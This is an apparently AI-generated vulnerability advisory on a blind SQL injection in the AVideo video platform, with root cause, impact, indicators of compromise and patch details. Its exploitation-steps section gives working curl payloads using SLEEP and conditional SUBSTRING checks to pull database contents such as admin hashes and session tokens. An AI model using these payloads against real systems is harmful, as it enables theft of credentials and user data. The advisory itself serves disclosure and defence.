CVE-2026-33651: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33651 is a blind SQL injection vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw exists in the remindMe.json.php endpoint, where the live_schedule_id request parameter is passed unsanitized into a SQL LIKE clause within Scheduler_commands::getAllActiveOrToRepeat(). Any authenticated user can exploit this to perform time-based blind SQL injection and extract arbitrary database contents. The vulnerability was published on March 22–23, 2026, and carries a CVSS v3.1 base score of 8.8 (High) per Feedly/NVD, or 8.1 (High) per the GitHub Advisory (Github Advisory, AVideo Advisory).

Technical details

The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). The $_REQUEST['live_schedule_id'] parameter in plugin/Live/remindMe.json.php is passed through a 6-step data flow without sanitization: intermediate functions (new Live_schedule(), getUsers_idOrCompany()) call intval() only on local copies inside ObjectYPT::getFromDb(), leaving the original tainted variable unchanged. The value is then embedded into a type string (LiveScheduleReminder_{$to_users_id}_{$live_schedule_id}) and directly concatenated into a SQL LIKE clause at Scheduler_commands.php:343 with no parameterization. An attacker supplying a payload such as 1" AND SLEEP(5) -- causes intval() to extract 1 (loading a valid schedule), while the full malicious string flows to the SQL sink, enabling time-based blind injection (AVideo Advisory, Patch Commit).

Impact

Successful exploitation allows any authenticated user to extract the entire database contents character-by-character via time-based blind SQL injection, including admin credentials, user PII (emails, password hashes), API keys, and session tokens. Depending on MySQL permissions, stacked queries or subquery-based writes could enable INSERT/UPDATE/DELETE operations, facilitating data modification or account takeover. The low privilege requirement (any registered user) significantly broadens the attack surface, and extracted admin credentials or session tokens could lead to full platform compromise (AVideo Advisory).

Exploitability

A proof-of-concept exploit with step-by-step curl commands is publicly available in the GitHub security advisory, demonstrating baseline timing, time-based injection confirmation, and character-by-character data extraction (AVideo Advisory). The EPSS score is approximately 0.026–0.037% (12th percentile), indicating low but non-zero probability of near-term exploitation. There is no evidence of in-the-wild exploitation or threat actor attribution at this time, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires only a valid authenticated session and at least one existing live schedule record.

Exploitation steps

  1. Obtain authenticated session: Register or log in to the target AVideo instance to obtain a valid PHPSESSID session cookie.
  2. Confirm a live schedule record exists: Verify that at least one live schedule record (e.g., ID=1) exists on the platform, which is required for the injection path to execute.
  3. Baseline request: Send a normal request to confirm the endpoint responds quickly:
curl -s -o /dev/null -w "%{time_total}" \
  -b "PHPSESSID=<valid_session>" \
  "http://target/plugin/Live/remindMe.json.php?live_schedule_id=1&minutesEarlier=10"

Expected response time: ~0.1–0.5 seconds. 4. Confirm time-based injection: Send a payload with SLEEP(5) to verify the injection point:

curl -s -o /dev/null -w "%{time_total}" \
  -b "PHPSESSID=<valid_session>" \
  --get --data-urlencode 'live_schedule_id=1" AND SLEEP(5) -- ' \
  --data-urlencode 'minutesEarlier=10' \
  "http://target/plugin/Live/remindMe.json.php"

A ~5-second delay confirms the injection. The resulting SQL is: SELECT * FROM scheduler_commands WHERE (status='a' OR status='r') AND \type` LIKE "LiveScheduleReminder_123_1" AND SLEEP(5) -- %"` 5. Extract data character-by-character: Use conditional time-based payloads to enumerate database contents:

curl -s -o /dev/null -w "%{time_total}" \
  -b "PHPSESSID=<valid_session>" \
  --get --data-urlencode 'live_schedule_id=1" AND IF(SUBSTRING(user(),1,1)="r",SLEEP(5),0) -- ' \
  --data-urlencode 'minutesEarlier=10' \
  "http://target/plugin/Live/remindMe.json.php"

Repeat with varying positions and characters to extract admin hashes, emails, session tokens, or other sensitive data. 6. Leverage extracted data: Use recovered admin credentials or session tokens to achieve full platform compromise or further lateral movement (AVideo Advisory).

Indicators of compromise

  • Network: Unusual or repeated HTTP GET requests to /plugin/Live/remindMe.json.php with URL-encoded live_schedule_id values containing SQL keywords (e.g., SLEEP, AND, IF, SUBSTRING, --); requests with abnormally long or non-numeric live_schedule_id parameters.
  • Logs: Web server access logs showing requests to remindMe.json.php with response times significantly exceeding baseline (e.g., >5 seconds), indicating time-based injection; multiple sequential requests to the same endpoint with varying live_schedule_id values from the same session.
  • Database: Unusual query patterns in MySQL slow query logs involving scheduler_commands table with LIKE clauses containing injected SQL fragments; unexpected SLEEP() or IF() function calls in query logs.
  • Application: AVideo application logs showing repeated calls to Scheduler_commands::getAllActiveOrToRepeat() with anomalous type strings containing SQL syntax (AVideo Advisory).

Mitigation and workarounds

Apply the patch from commit 75d45780728294ededa1e3f842f95295d3e7d144, which implements two complementary fixes: (1) sanitizing $_REQUEST['live_schedule_id'] with intval() at the entry point in remindMe.json.php, and (2) converting the SQL query in Scheduler_commands::getAllActiveOrToRepeat() to use parameterized prepared statements with bound values. Upgrade to a version of WWBN AVideo that includes this commit (post-26.0). As an interim workaround, restrict access to the remindMe.json.php endpoint via web server configuration (e.g., IP allowlisting or WAF rules blocking SQL keywords in the live_schedule_id parameter) (AVideo Advisory, Patch Commit).

Community reactions

The vulnerability was published by the AVideo maintainer (DanielnetoDotCom) via GitHub Security Advisories on March 22, 2026, and subsequently reviewed and added to the GitHub Advisory Database on March 25, 2026. Social media activity was observed on Bluesky shortly after disclosure. No significant independent researcher commentary or major media coverage has been identified beyond automated CVE tracking services (AVideo Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management